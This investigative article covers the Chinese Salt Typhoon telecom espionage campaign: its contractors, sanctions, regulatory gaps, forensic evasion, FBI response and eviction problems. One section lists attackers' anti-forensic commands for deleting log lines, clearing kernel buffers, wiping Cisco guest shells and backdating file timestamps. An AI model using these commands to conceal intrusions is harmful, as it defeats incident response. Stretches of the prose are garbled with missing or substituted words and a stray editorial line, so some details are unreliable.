The indictment and subsequent sanctions highlight the MSS’s reliance on a “hacker-for-hire” model. This structure allows the Chinese government to plausibly deny direct involvement while maintaining strict operational control. Intelligence officers from the MSS provide the targeting lists, such as the specific phone numbers of senior White House officials or campaign staff, while contractors like Sichuan Juxinhe execute the technical intrusion. This division of labor was further corroborated by the March 5, 2025, Department of Justice charges against 12 Chinese nationals linked to i-Soon (Anxun Information Technology), another contractor within the same MSS orbit. These legal filings exposed a sprawling marketplace where private firms compete for government contracts to hack foreign ministries, telecommunications firms, and dissident groups.

Key MSS-Affiliated Entities and Individuals Sanctioned (2024, 2025)

Entity / Individual	Affiliation	Role in Espionage Campaign	Date of Action
Yin Kecheng	MSS Affiliate / Salt Typhoon	Directly orchestrated intrusions into U. S. Treasury and telecom networks; sanctioned for “direct involvement” in Salt Typhoon.	Jan 17, 2025
Sichuan Juxinhe Network Technology	MSS Contractor	Provided corporate cover and infrastructure for Salt Typhoon operations; developed malware for telecom exploitation.	Jan 17, 2025
Wuhan Xiaoruizhi Science & Tech	MSS Front Company (APT31)	Served as cover for hacking operations targeting U. S. serious infrastructure and political figures.	Mar 25, 2024
Zhao Guangzong	APT31 Operator	Conducted spear-phishing campaigns against U. S. Naval Academy and political.	Mar 25, 2024
Ni Gaobin	APT31 Operator	Managed command-and-control infrastructure for MSS operations targeting 5G equipment providers.	Mar 25, 2024

The operational security failures of these groups have provided Western intelligence agencies with a roadmap of the MSS’s internal structure. In the case of the APT31 group, which shares significant overlap with Salt Typhoon’s tradecraft, the March 2024 indictment of seven nationals revealed that operators were incentivized with performance bonuses based on the volume and value of stolen data. This corporate incentivization structure drives the relentless persistence observed in the Salt Typhoon campaign; operators are not fulfilling a patriotic duty are working to meet quarterly quotas for intelligence gathering. The data exfiltrated from U. S. telecom wiretap systems was likely a high-priority deliverable demanded by MSS handlers to monitor high-value American political.

Also, the investigation into Sichuan Juxinhe exposed the technical pedigree of the human operators. were recruited directly from Chinese universities with specialized degrees in network security and telecommunications engineering. Their expertise is not limited to general hacking extends to the specific proprietary used by Cisco, Juniper, and Fortinet routers. This academic and professional background allows Salt Typhoon operators to navigate the complex back-end systems of ISPs with the proficiency of a certified network administrator. The sanctions against Yin Kecheng and his firm serve as a legal method to sever their access to the global financial system, they also function as a public attribution, stripping away the anonymity that these state-sponsored actors rely upon.

The connection between these human operators and the specific tools used in the Salt Typhoon campaign is definitive. Forensic analysis linked the “Earth Estries” and “FamousSparrow” activity clusters, industry names for Salt Typhoon, directly to the infrastructure managed by Sichuan Juxinhe. When the FBI and CISA issued their joint advisory, they noted that the actors displayed a familiarity with U. S. lawful intercept systems that could only be acquired through sustained study and specialized training. The indictments confirm that this knowledge was not accidental the product of a dedicated, state-funded enterprise designed to turn the architecture of the internet into a surveillance weapon.

Regulatory Gaps: Vulnerabilities in serious Infrastructure Oversight

The Salt Typhoon campaign exposed a fatal paradox in American telecommunications policy: the very regulations designed to aid law enforcement created the precise attack vectors exploited by Chinese intelligence. For decades, the U. S. government prioritized the accessibility of networks for wiretapping over the security of those networks against foreign intrusion. This structural vulnerability, compounded by a reliance on voluntary industry standards rather than mandatory cybersecurity, allowed Salt Typhoon operatives to turn the U. S. surveillance apparatus against its creators.

At the center of this failure stands the Communications Assistance for Law Enforcement Act (CALEA) of 1994. CALEA mandates that telecommunications carriers design their systems to ensure federal agencies can intercept communications pursuant to a court order. While intended to catch criminals, CALEA required carriers to build permanent backdoors into their infrastructure. Salt Typhoon did not need to break the encryption of individual; they simply located these lawful intercept interfaces and used them exactly as designed, albeit without a warrant. By compromising the “trust” of the network, the portals used to process wiretap requests, the hackers gained real-time access to call records, geolocation data, and unencrypted traffic of senior U. S. officials.

The exploitation of these systems was facilitated by a regulatory environment that treated cybersecurity as a business decision rather than a national security mandate. Investigations by the Senate Commerce Committee in December 2025 revealed that major carriers had failed to implement “rudimentary” security measures. In instances, the lawful intercept systems were protected by weak, default passwords or were running on legacy equipment with vulnerabilities that had been unpatched for seven years. Because the Federal Communications Commission (FCC) historically absence the specific authority to mandate patch pattern or network segmentation for these internal systems, carriers faced no legal penalty for this negligence.

The regulatory response to the emergency throughout 2025 was characterized by volatility and partisan gridlock, leaving the sector exposed. In January 2025, following the initial public disclosures of the breach, the FCC issued a Declaratory Ruling classifying the security of CALEA compliance systems as a mandatory obligation. This ruling would have required carriers to submit annual cybersecurity risk management plans and certify their adherence to specific defense standards. yet, this push for accountability was short-lived.

By November 2025, a reconstituted FCC leadership voted 2-1 to reverse the January ruling, arguing that “top-down” regulations were unlawful and would public-private partnership. The commission returned to a framework of voluntary cooperation, accepting industry assurances, described by critics as “pinky pledge”, that they would remediate the flaws. This reversal occurred even with intelligence assessments indicating that Salt Typhoon actors maintained persistent access to several networks. The decision drew sharp rebuke from national security experts who noted that voluntary standards had already failed to prevent the “worst telecom hack in U. S. history.”

Table: Regulatory method vs. Salt Typhoon Exploitation

Regulatory method	Intended Function	Salt Typhoon Exploitation Method	Regulatory Failure
CALEA (1994)	Mandate “lawful intercept” capabilities for law enforcement.	Hijacked the intercept portals to monitor without detection.	Mandated backdoors created a high-value, single-point-of-failure target.
CSRIC (Voluntary)	Industry-led council to recommend security best practices.	Ignored best practices; exploited 7-year-old unpatched vulnerabilities.	absence of enforcement method allowed carriers to defer security costs.
FCC Section 214	Revoke licenses of Chinese carriers (e. g., China Telecom).	Bypassed by hacking U. S. domestic carriers (AT&T, Verizon) directly.	Focused on foreign hardware/carriers while ignoring domestic software hygiene.
CISA Advisories	Disseminate threat intelligence and mitigation guidance.	Advisories were issued after deep penetration had already occurred.	CISA absence regulatory authority to force carriers to implement fixes.

The limitations of the Cybersecurity and Infrastructure Security Agency (CISA) further exacerbated the oversight gap. While CISA serves as the operational lead for federal cybersecurity, it possesses no regulatory teeth to compel telecommunications providers to secure their networks. During the height of the Salt Typhoon remediation efforts in mid-2025, CISA could only “advise” and “encourage” carriers to isolate compromised infrastructure. The agency’s inability to demand access to carrier logs or force the shutdown of systems meant that the timeline for eviction was dictated by the carriers’ commercial interests rather than national security urgency.

aAso, supply chain oversight method, such as the “Secure and Trusted Communications Networks Act” (Rip and Replace), were narrowly focused on physical hardware from specific Chinese vendors like Huawei and ZTE. Salt Typhoon demonstrated that removing Chinese hardware is insufficient if the software running on American-made equipment remains. The attackers utilized flaws in Cisco and Juniper routers, trusted American brands, proving that the “Buy American” method to network security offers no protection against poor configuration management and lax regulatory enforcement.

As of early 2026, the U. S. telecommunications sector remains in a “gray zone” of oversight. The refusal to classify lawful intercept systems as serious assets subject to mandatory federal inspection has left the digital front door unlocked. Until regulations align the financial incentives of carriers with the security imperatives of the state, the infrastructure built to protect the public remain a weapon in the hands of adversaries.

Data in Perpetuity: The Long-Term AI Analysis of Stolen Metadata

The strategic value of the Salt Typhoon exfiltration extends far beyond the immediate tactical gains of reading a specific SMS or listening to a single phone call. Intelligence officials and data scientists assess that the primary objective of this campaign was the acquisition of a massive, structural dataset designed to feed the People’s Republic of China’s (PRC) artificial intelligence models.

By ingesting the call detail records (CDRs), geolocation logs, and internet traffic patterns of millions of Americans, the Ministry of State Security (MSS) has fed its AI systems the raw material needed to map the social and professional hierarchies of the United States for the decade. This operation marks a pivot from traditional espionage, which specific secrets, to “population- ” surveillance, where the goal is to possess the entire haystack so that advanced algorithms can locate needles that human analysts do not yet know exist.

The Raw Material: What Was Stolen

To understand the AI threat, one must categorize the data Salt Typhoon extracted. Between 2023 and 2025, the group successfully compromised the internal systems of major telecommunications providers including Verizon, AT&T, and Lumen Technologies. The stolen data types were not random; they were selected for their utility in graph analysis and pattern recognition. * **Call Detail Records (CDRs):** These logs show who spoke to whom, for how long, and at what time.

They do not contain audio reveal the structure of a target’s network. * **Geolocation Metadata:** Cell tower triangulation data that tracks the physical movement of devices over months or years. * **Lawful Intercept Requests:** Data revealing which phone numbers were under surveillance by U. S. law enforcement, exposing active FBI and DOJ investigations to the adversary. * **Unencrypted Text Messages:** Content that provides semantic context to the metadata.

The AI Application: From Data to Intelligence

The sheer volume of this data, chance involving billions of records, renders human analysis impossible. yet, for the PRC’s state-aligned AI initiatives, this volume is an asset. FBI Director Christopher Wray warned in 2024 that China is using the “fruits of their widespread hacking to power, with AI, even more hacking efforts.”

The Salt Typhoon dataset allows for specific, high-value analytical processes that were previously theoretical. **Pattern-of-Life Modeling** Machine learning models can ingest geolocation and CDR data to establish a “baseline of normalcy” for millions of users. Once this baseline is set, the AI can autonomously flag anomalies. For example, if a device associated with a defense contractor suddenly begins traveling to a location associated with a divorce lawyer or a gambling addiction clinic, the system flags the individual as a chance recruitment target for blackmail.

This process requires no human tasking; the algorithm simply hunts for use. **The “Burner” Correlation** Intelligence operatives and criminals frequently use “burner” phones to evade detection. AI analysis of Salt Typhoon data nullifies this tradecraft. By cross-referencing the geolocation of a known device (e. g., a diplomat’s personal phone) with the movement of unknown devices, an algorithm can identify “co-travelers.”

If Phone A and Phone B sleep at the same address and move in tandem for three days, the AI links the burner identity to the diplomat with near-perfect accuracy. **Mapping the Shadow Network** Perhaps the most damaging application is the reconstruction of covert networks. By analyzing the CDRs of known U. S. intelligence officers (identified through the OPM hack or other breaches), Chinese AI can traverse the “degrees of separation.” If an officer calls a seemingly random number, and that number calls three others, the AI builds a graph of the officer’s chance sources or assets. This “contact chaining” can unmask undercover operatives who have never been directly compromised communicated with someone who was.

The Time-Machine Effect

The danger of this dataset is not limited to the present. Metadata is static; the fact that Person A called Person B on January 12, 2025, never change. This permanence allows the MSS to perform retrospective analysis. In 2028, if a junior congressional staffer rises to a position of high clearance, Chinese intelligence services can query the Salt Typhoon dataset from 2024. They instantly know who that staffer was dating, where they spent their weekends, and who they communicated with before they had a security clearance. The data serves as a “time machine,” allowing the adversary to investigate a target’s past long after the initial breach has been patched.

Comparative Analysis Capabilities

The following table illustrates the between traditional human intelligence analysis and the AI-driven capabilities enabled by the Salt Typhoon dataset.

Table: Human vs. AI Analysis of Telecommunications Metadata

Operational Metric	Human Analyst Capability	AI/ML Capability (PRC State-Level)
Processing Volume	Can review ~100 records per day.	Can process billions of records per hour.
Relationship Mapping	Identifies direct contacts (1st degree).	Identifies complex networks (Nth degree) and hidden clusters.
Anomaly Detection	Requires specific trigger or tip-off.	Autonomous, continuous scanning for deviation from baseline.
Co-Traveler Identification	Labor-intensive manual correlation.	Instant automated matching of device movements globally.
Retention Utility	Data value degrades as memory fades.	Data value increases as models improve and new emerge.

Strategic

The integration of Salt Typhoon data into China’s AI ecosystem represents a permanent shift in the counter-intelligence balance. The CISA and FBI joint advisories in 2025 emphasized that this is not a temporary breach a “long-term strategic advantage” for the adversary. The theft of wiretap data, in particular, allows the MSS to train its models on *how* the U. S. government conducts investigations, enabling them to predict and evade future American surveillance efforts.

By feeding American telecommunications data into their large language models and graph neural networks, the PRC has created a digital mirror of U. S. society. This mirror allows them to simulate social pressures, predict the movement of key personnel, and identify vulnerabilities in the American human terrain with a precision that was previously the domain of science fiction.

Operational Security: Forensic Anti-Forensics and Log Wiping

Salt Typhoon operates with a level of forensic paranoia that distinguishes it from financially motivated cybercriminal groups. Unlike ransomware gangs that announce their presence through encryption notices, this state-sponsored entity prioritizes “zero-trace” persistence. Their operational security (OpSec) doctrine relies on aggressive anti-forensic techniques designed to destroy evidence of residency, blinding incident response teams and extending dwell times.

Analysis of intrusions between 2020 and 2025 reveals a systematic method to log sterilization, timestamp manipulation, and kernel-level obfuscation that has allowed the group to maintain access for periods exceeding nine months in high-value government networks.

The group’s most potent anti-forensic capability is the Demodex rootkit, a kernel-mode implant deployed on Windows servers. Demodex is engineered specifically to conceal the actor’s footprint from the operating system itself. It intercepts system calls to hide malicious files, registry keys, and network traffic from security products and forensic tools.

To bypass Windows Driver Signature Enforcement (DSE), a security feature designed to prevent unsigned drivers from loading into the kernel, Salt Typhoon use a signed driver from the open-source “Cheat Engine” project. This “bring your own driver” (BYOVD) technique allows them to manipulate kernel memory and load the unsigned Demodex rootkit without triggering alerts, rendering their presence invisible to standard endpoint detection and response (EDR) agents.

On network infrastructure, particularly Cisco routers and Linux-based appliances, Salt Typhoon executes precise command sequences to sanitize logs. Forensic analysis of compromised telecommunications equipment has recovered script fragments used to surgically remove incriminating entries rather than deleting entire log files, which would raise suspicion.

For instance, operators have been observed using the sed stream editor to delete specific lines containing keywords like “segfault” or specific IP addresses from debug logs, leaving the rest of the file intact. In other instances, they employ the dmesg -C command to clear the kernel ring buffer, wiping evidence of hardware-level interactions or crash dumps that could betray their activities.

The group also weaponizes the “Guest Shell” feature on Cisco IOS XE devices. After using this containerized Linux environment to run reconnaissance tools or move laterally, operators execute the guestshell disable command. This action not only stops the container wipes the temporary file system associated with it, destroying tools and command histories resident within the shell. This ephemeral execution method leaves little to no forensic residue on the device’s persistent storage, complicating post-incident attribution.

Timestomping, the alteration of file timestamps, is another core component of their anti-forensic toolkit. Salt Typhoon operators frequently modify the $STANDARD_INFORMATION attribute of malicious files to match the creation dates of legitimate system files (e. g., calc. exe or ntdll. dll). This technique places malicious artifacts outside the time windows scrutinized by forensic analysts during a triage. PowerShell commands are frequently used to automate this process, ensuring that dropped web shells or backdoors blend direct into the target’s file system chronology.

Technique / Tool	Target Environment	Forensic Impact	Observed Command / Method
Demodex Rootkit	Windows Servers	Hides files, processes, registry keys, and network connections from OS and EDR.	Kernel-mode hooking via BYOVD (Cheat Engine driver).
Log Injection/Deletion	Linux / Unix	Surgically removes specific error logs or trace entries.	sed -i '/segfault/d' debuglog; dmesg -C
Container Wiping	Cisco IOS XE	Destroys file system and history of guest container.	guestshell disable
Timestomping	Windows / NTFS	Backdates file attributes to match legitimate system files.	(Get-Item file). creationtime = '1/8/2019'
State Dump Deletion	Network Appliances	Removes crash dumps that contain memory artifacts.	rm -rf /data/var/statedumps/*

The efficacy of these measures is clear in the dwell time metrics associated with Salt Typhoon intrusions. In a confirmed breach of a U. S. Army National Guard network, the group maintained access from March through December 2024, a period of nine months, before detection. This extended residency allowed for the exfiltration of serious network configuration files and administrator credentials. The delay in detection was directly attributed to the group’s discipline in cleaning up “state dumps” and obfuscating their lateral movement through the network’s own administrative pathways.

The FBI Response: The $10 Million Bounty and Task Force

The Federal Bureau of Investigation (FBI) escalated its counter-espionage operations against the Salt Typhoon shared in 2025, abandoning traditional containment strategies for an aggressive, public-facing offensive. Recognizing that the People’s Republic of China (PRC) had state-sponsored actors deep within the telecommunications backbone of the United States, the Bureau deployed its most significant financial weapon: the Department of State’s Rewards for Justice (RFJ) program.

On April 29, 2025, the FBI and the State Department announced a reward of up to $10 million for information leading to the identification or location of any person who, while acting at the direction of a foreign government, participates in malicious cyber activities against U. S. serious infrastructure. While the RFJ program has long targeted terror financing, this specific bounty was calibrated to fracture the operational security of the Ministry of State Security (MSS) and its network of contractors. The announcement explicitly sought actionable intelligence on individuals associated with Sichuan Juxinhe Network Technology Co., Ltd., a front company identified by Treasury officials as a primary logistical node for Salt Typhoon operations.

Brett Leatherman, Assistant Director of the FBI’s Cyber Division, characterized the bounty as a necessary tool to pierce the “veil of anonymity” protecting MSS contractors. “We are not just looking for IP addresses,” Leatherman stated during a press briefing at the RSA Conference in San Francisco. “We are looking for the names, travel patterns, and financial accounts of the specific operators who believe they can target American infrastructure with impunity.”

Interagency Task Force and H. R. 9769

Parallel to the financial offensive, the legislative and executive branches moved to formalize the interagency response. Following the introduction of H. R. 9769, known as the Strengthening Cyber Resilience Against State-Sponsored Threats Act, the FBI and the Cybersecurity and Infrastructure Security Agency (CISA) established a dedicated interagency task force. This body was not a consultative group an operational unit mandated to “prioritize and coordinate U. S. government efforts” to evict Salt Typhoon actors from domestic networks.

The task force operated under a “hunt-forward” directive, deploying teams to major telecommunications providers, including AT&T, Verizon, and Lumen, to conduct forensic eradications. Unlike previous voluntary partnerships, the task force leveraged new authorities to demand real-time data sharing from victimized entities. By August 2025, this unit had identified Salt Typhoon activity in over 600 organizations across 80 countries, confirming that the campaign was a global prepositioning effort rather than espionage.

Date	Action	Target / Entity	Impact
Jan 17, 2025	Treasury Sanctions	Sichuan Juxinhe Network Technology; Yin Kecheng	Blocked assets and exposed MSS contractor links.
Apr 29, 2025	RFJ Bounty Offer	Salt Typhoon Individuals	$10 million reward for identification of operators.
Aug 27, 2025	Joint Advisory	Global Telecom Sector	Released technical signatures for detection in 80+ nations.
Dec 10, 2024	Legislative Action	H. R. 9769 Passage	Mandated creation of the FBI-CISA interagency task force.

Sanctions and Attribution

The FBI’s investigation provided the evidentiary basis for the Department of the Treasury’s Office of Foreign Assets Control (OFAC) to impose sanctions. On January 17, 2025, OFAC Sichuan Juxinhe Network Technology Co., Ltd. and an individual national, Yin Kecheng, for their direct roles in the campaign. The sanctions froze all U. S. assets held by these entities and prohibited American firms from conducting business with them.

This attribution was significant because it pierced the corporate veil frequently used by Chinese intelligence services. Sichuan Juxinhe was not a rogue criminal enterprise a legitimate-looking technology firm in Chengdu that provided “cyber-related products and services” to the MSS. The FBI’s forensic analysis revealed that Yin Kecheng and his associates had developed specific tools to exploit Cisco IOS XE vulnerabilities, allowing them to intercept “lawful intercept” data, the very systems used by U. S. law enforcement for court-ordered wiretaps.

The task force also coordinated with international partners, including the United Kingdom’s National Cyber Security Centre (NCSC) and the Australian Signals Directorate (ASD). In August 2025, this coalition released a joint advisory that detailed the “living-off-the-land” techniques used by Salt Typhoon, such as modifying router configurations to route traffic through GRE tunnels. This technical exposure forced the MSS to abandon several compromised nodes, temporarily disrupting their ability to exfiltrate data from the nine primary U. S. victim companies.

even with these successes, FBI officials remained cautious. In a July 2025 interview, Leatherman noted that while the threat was “largely contained” within known victim networks, the actors remained “dormant” rather than fully eradicated. The $10 million bounty remains active, a standing offer to any insider within the Chinese technical community to trade state secrets for a new life in the West.

Geopolitical: Escalation in US-China Cyber Relations

The exposure of the Salt Typhoon campaign has precipitated a sharp and dangerous escalation in Sino-American relations, transforming a chronic cybersecurity irritant into a central pillar of geopolitical confrontation. Unlike previous incidents involving intellectual property theft or ransomware, the Salt Typhoon operation, specifically its compromise of “lawful intercept” systems, was interpreted by Washington not as espionage, as a direct assault on the sovereign legal of the United States. The has triggered a cascade of sanctions, diplomatic expulsions, and retaliatory rhetoric that has frozen bilateral cooperation on digital security.

In January 2025, the U. S. Department of the Treasury’s Office of Foreign Assets Control (OFAC) formally sanctioned Sichuan Juxinhe Network Technology Co. Ltd. and an individual national, Yin Kecheng, citing irrefutable evidence of their role in the Salt Typhoon infrastructure. This marked a significant departure from the “name and shame” indictments of the past; these were direct economic strikes against entities integrated into China’s Ministry of State Security (MSS) supply chain. The sanctions severed these entities from the global financial system, a move that Beijing immediately decried as “illegal unilateral jurisdiction.”

Diplomatic Retaliation and the “Hacking Empire” Narrative

The diplomatic response from the People’s Republic of China was swift and coordinated. In a press conference following the sanctions, Ministry of Foreign Affairs spokesperson Mao Ning rejected the attribution entirely, characterizing the U. S. evidence as “fabricated disinformation” designed to justify technological containment. Beijing pivoted to a counter-narrative, labeling the United States the world’s “Hacking Empire.” This rhetoric was amplified by Chinese state media, which recirculated The following HTML fragment covers Section 24: Remediation Reality: The Technical Difficulty of ‘Burn Down’ Eviction.

Remediation Reality: The Technical Difficulty of ‘Burn Down’ Eviction

The eviction of Salt Typhoon from compromised telecommunications infrastructure represents a technical challenge that transcends standard incident response. Unlike ransomware actors who encrypt files and demand payment, Salt Typhoon operatives themselves into the very firmware of network edge devices, specifically Cisco routers and switches that form the backbone of global data transit. Security professionals and federal agencies have increasingly acknowledged that traditional “patch and reboot” methodologies are insufficient. Instead, the industry faces the grim reality of a “burn down” scenario: the need of physically replacing hardware or conducting total, bare-metal reimaging of serious infrastructure to guarantee the adversary’s removal.

This persistence is driven by the group’s ability to exploit zero-day vulnerabilities in network operating systems, most notably Cisco IOS XE. By leveraging defects such as CVE-2023-20198 and CVE-2023-20273, Salt Typhoon actors gain root-level privileges that allow them to rewrite the device’s operating code. Once this “implant” is established, the adversary controls the boot process itself. A standard firmware update applied by a network administrator may report success while the malicious code remains active in the background, surviving reboots and factory resets. CISA and the FBI have warned that without forensic verification of the hardware’s integrity, a process that frequently requires taking the device offline and shipping it to a lab, operators cannot be certain the threat is neutralized.

The Mechanics of Deep Persistence

Salt Typhoon’s tradecraft relies on “living off the land” techniques that turn legitimate network administration tools into weapons of espionage. Once inside a router, they frequently configure Generic Routing Encapsulation (GRE) tunnels. These tunnels create covert, encrypted communication channels that bypass standard firewalls, allowing traffic to flow directly to command-and-control (C2) servers under the guise of normal network routing. also, investigators have found modified Access Control Lists (ACLs) hidden deep within device configurations, frequently named innocuously (e. g., “access-list 20”), which silently permit unauthorized traffic from specific IP ranges associated with Chinese intelligence infrastructure.

The following table contrasts standard remediation efforts with the extreme measures required to dislodge Salt Typhoon:

Remediation Step	Standard Cyber Threat	Salt Typhoon (State-Sponsored)
Detection	Antivirus/EDR alerts on endpoints.	Behavioral analysis of router traffic; no EDR exists for routers.
Containment	Isolate infected machine from network.	Impossible to isolate core routers without cutting ISP service.
Eradication	Reformat hard drive and reinstall OS.	“Burn Down”: Physical hardware replacement or JTAG flashing.
Verification	Scan for malware signatures.	Memory forensics required; persistence frequently survives updates.
Cost	Low (software re-image).	Extreme (hardware replacement at carrier ).

The Logistical Impossibility of

The “burn down” method hits a wall when applied to the of a Tier-1 telecommunications provider. A major ISP may operate tens of thousands of edge routers and core switches. Replacing this hardware is not a financial load, estimated in the billions of dollars, a logistical impossibility within a short timeframe. Supply chains for high-end networking gear frequently have lead times of 6 to 12 months. Consequently, carriers are forced into a perilous middle ground: attempting to sanitize infected devices while knowing that a single missed implant allows the adversary to re-infect the entire sanitized segment immediately.

“We cannot say with certainty that the adversary has been evicted, because we still don’t know the scope of what they’re doing. I have confidence that we are on top of it… we cannot, with confidence, say that we know everything.”
, Jeff Greene, Executive Assistant Director for Cybersecurity, CISA (December 2024)

This uncertainty has led to a “zombie network” phenomenon where operators must assume their infrastructure remains compromised even after remediation pattern. In late 2024 and throughout 2025, reports surfaced of Salt Typhoon re-appearing in networks that had been declared clean weeks prior. The group’s use of GhostSpider malware and lateral movement through valid administrative credentials means they can hide in the noise of legitimate traffic, waiting for the remediation teams to stand down before reactivating their access.

, the technical difficulty of eviction forces a shift in strategy from “prevention” to “resilience.” If the hardware cannot be trusted, the data traversing it must be secured independently. This reality has accelerated the adoption of Zero Trust Architecture and pervasive encryption, assuming that the transport itself is hostile territory controlled by foreign intelligence services.

Strategic Pre-Positioning: Espionage vs. chance Sabotage

The distinction between active espionage and the preparation for future sabotage is frequently a matter of intent rather than capability. In the case of Salt Typhoon, the depth of access achieved within the United States telecommunications infrastructure suggests a dual-purpose campaign. While the primary observed activity between 2023 and 2025 has been the theft of sensitive call records and the monitoring of specific, federal intelligence agencies assess that these same footholds constitute a strategic “pre-positioning” of assets. This placement allows the People’s Republic of China (PRC) to chance disrupt or sever serious communications during a future kinetic conflict.

Security researchers and government officials have long differentiated between threat actors who steal data and those who prepare to destroy systems. Salt Typhoon blurs this line. By compromising the core routing infrastructure and Lawful Interception (LI) systems of major providers like AT&T, Verizon, and Lumen Technologies, the group has secured a vantage point that offers total visibility into network traffic. This level of control is functionally identical to the access required to execute a “kill switch” scenario, where traffic could be selectively dropped, rerouted, or blocked entirely.

The Dual-Use Nature of Backbone Access

The specific technical achievements of Salt Typhoon reveal why the sabotage threat is considered credible by the FBI and CISA. The group did not infect endpoints; they compromised Cisco IOS XE devices and the systems used for CALEA (Communications Assistance for Law Enforcement Act) compliance. These systems are designed to be privileged, stable, and unhindered by standard firewalls to ensure law enforcement can execute court-ordered wiretaps.

Accessing these systems for espionage allows the actor to listen to calls and read texts. yet, the same administrative privileges allow for the reconfiguration of routing tables. In a sabotage scenario, an attacker with this access could corrupt the routing logic that directs data packets across the internet backbone. A coordinated execution of such commands across multiple compromised providers would result in a catastrophic loss of connectivity for civilian and military users alike, isolating large geographic regions from the national grid.

In February 2024, CISA, the NSA, and the FBI released a joint advisory warning that PRC state-sponsored actors were “pre-positioning” themselves on IT networks for disruptive attacks. While this warning heavily referenced Volt Typhoon’s focus on energy and water sectors, later assessments in late 2024 clarified that Salt Typhoon’s hold on the telecommunications sector serves as the nervous system for this broader strategy. Without reliable communications, the coordination required to remediate attacks on power or water plants becomes nearly impossible.

Operational Indicators: Intelligence Collection vs. Latent Destruction

Analyzing the forensic footprint of Salt Typhoon helps distinguish between their current operations and their chance future capabilities. The following table outlines how specific compromised assets serve both immediate intelligence goals and latent destructive chance.

Table 25. 1: Salt Typhoon Asset Utilization , Espionage vs. Sabotage Capabilities

Compromised Asset	Current Espionage Function	Latent Sabotage chance
Lawful Interception (LI) Systems	Real-time monitoring of voice/text; tracking subject to US warrants.	Deletion of warrant data; disruption of FBI/police surveillance; fabrication of evidence.
Cisco IOS XE Routers	Port mirroring to copy traffic for exfiltration; mapping network topology.	“Blackholing” traffic (dropping packets); severing connections between key data centers.
User Authentication Databases	Credential harvesting to access cloud environments and email servers.	Mass lockout of legitimate administrators; deletion of user profiles to prevent recovery.
Network Management Systems	Silent observation of network health to avoid detection.	Falsifying monitoring data to hide outages; disabling alarms during a kinetic attack.

The “Hold at Risk” Strategy

The strategic logic behind this pre-positioning is known as “holding serious infrastructure at risk.” By maintaining deep, persistent access, Beijing creates a deterrent against U. S. action in the Indo-Pacific. If a conflict were to erupt over Taiwan, the PRC could use Salt Typhoon’s access to induce panic and paralysis within the United States homeland. The psychological impact of a sudden, unexplained failure of cellular and internet services would be immediate, chance delaying military mobilization and decision-making.

In December 2024, reports surfaced that Salt Typhoon had extended its reach beyond commercial providers to the networks of the Army National Guard in at least one state. This lateral movement from ISP backbones into military-adjacent networks signals a shift from pure foreign intelligence collection to operational preparation. The theft of network maps and administrative credentials from these entities provides the blueprints necessary to them. FBI officials noted in early 2025 that the group’s operations were “still very much ongoing,” implying that even with public exposure, the actors retained functional access to key nodes.

The difficulty in countering this threat lies in the legitimate nature of the tools abused. Salt Typhoon frequently uses “living off the land” techniques, employing standard administrative commands to move through networks. Distinguishing between a systems administrator updating a route and a Salt Typhoon operative preparing a blackout requires behavioral analysis that legacy telecom systems are not equipped to perform. Until these architectures are modernized to enforce Zero Trust principles, the infrastructure remains primed for chance disruption.

Conclusion: The Permanent Shift in Sovereign Network Defense

The exposure of the Salt Typhoon campaign in late 2024 did not reveal a vulnerability in United States telecommunications infrastructure. It shattered the foundational assumption that domestic carrier networks are trusted environments. By penetrating the Lawful Intercept systems, the very architecture designed for court-authorized wiretaps, the actors attributed to the Ministry of State Security (MSS) demonstrated that the “backbone” of American connectivity is contested territory. The subsequent through 2025 has forced a permanent alteration in how sovereign nations conceive of network defense.

Federal agencies have moved from a posture of perimeter defense to one of “presumed compromise.” In December 2024, the FBI and CISA took the extraordinary step of recommending that government officials and corporate executives switch to encrypted messaging applications for sensitive communications. This guidance admitted that the standard cellular voice and SMS provided by major carriers like AT&T and Verizon could no longer be secured against state-level adversaries. The era of the “clean pipe” is over. Organizations must operate as if the transport itself is hostile.

The political and regulatory response in 2025 amplified this fragmentation. While the Biden administration initially attempted to mandate strict cybersecurity certifications for telecom providers in January 2025, the political transition led to a sharp reversal. In November 2025, the Federal Communications Commission (FCC) voted 2-1 to rescind these mandatory cybersecurity rules, favoring a voluntary cooperation model. This deregulation occurred even as Senator Mark Warner confirmed in December 2025 that intelligence agencies still offered “conflicting assessments” on whether Salt Typhoon actors had been fully evicted from U. S. networks. The disbanding of the Cyber Safety Review Board (CSRB) in January 2025 further decentralized the response, leaving individual agencies and corporations to fund and manage their own defense overlays.

The operational impact of this shift is visible in the new “Sovereign Overlay” doctrine adopted by serious infrastructure sectors. Defense is no longer about hardening the ISP’s routers, as those are outside the customer’s control. Instead, defense focuses on cryptographic isolation of data before it touches the carrier network. The breach of a U. S. state’s Army National Guard network, revealed in a July 2025 DHS memo to have lasted nine months, proved that reliance on perimeter security allows adversaries to dwell for extended periods. The response has been a decoupling of sensitive traffic from the underlying transport infrastructure.

Table 26. 1: The Shift in Sovereign Network Defense Doctrine (2024, 2026)

Defense Component	Pre-Salt Typhoon Doctrine (Legacy)	Post-Salt Typhoon Doctrine (Current)
Trust Model	Implicit trust in Tier 1 Carriers (ISPs).	Zero Trust. ISP networks treated as “Untrusted/Hostile.”
Communication Security	Reliance on cellular standards (4G/5G/SMS).	Mandatory over-the-top (OTT) encryption.
Lawful Intercept (CALEA)	Viewed as a law enforcement tool.	Viewed as a high-risk attack surface for foreign espionage.
Hardware Supply Chain	Focus on banning specific vendors (e. g., Huawei).	Focus on “Living off the Land” attacks on approved gear (Cisco/Juniper).
Remediation Strategy	Patch and reboot.	Hardware replacement and firmware forensic auditing.

The financial of this shift are substantial. Telecommunications providers face the dual load of ripping out compromised legacy hardware while managing the reputational damage of the breach. For the United States government, the cost is strategic. The Salt Typhoon campaign demonstrated that the People’s Republic of China could access the metadata of presidential campaigns and the content of unencrypted calls at. This capability acts as a potent asymmetric weapon. It forces the U. S. to spend billions on overlay encryption and secure hardware while the adversary exploits vulnerabilities in decades-old like signaling system 7 (SS7) and the complexities of BGP routing.

Salt Typhoon proved that the digital borders of the United States are porous. The response has not been to seal the border, which is technically impossible in a globalized internet, to armor the convoys moving through it. Sovereign network defense relies on the assumption that the adversary is already inside the wire. The objective is no longer total prevention of access. The objective is the preservation of command and control even with that access.

**This article was originally published on our controlling outlet and is part of the Media Network of 2500+ investigative news outlets owned by  Ekalavya Hansaj. The full list of all our brands can be checked here. You may be interested in reading further original investigations here.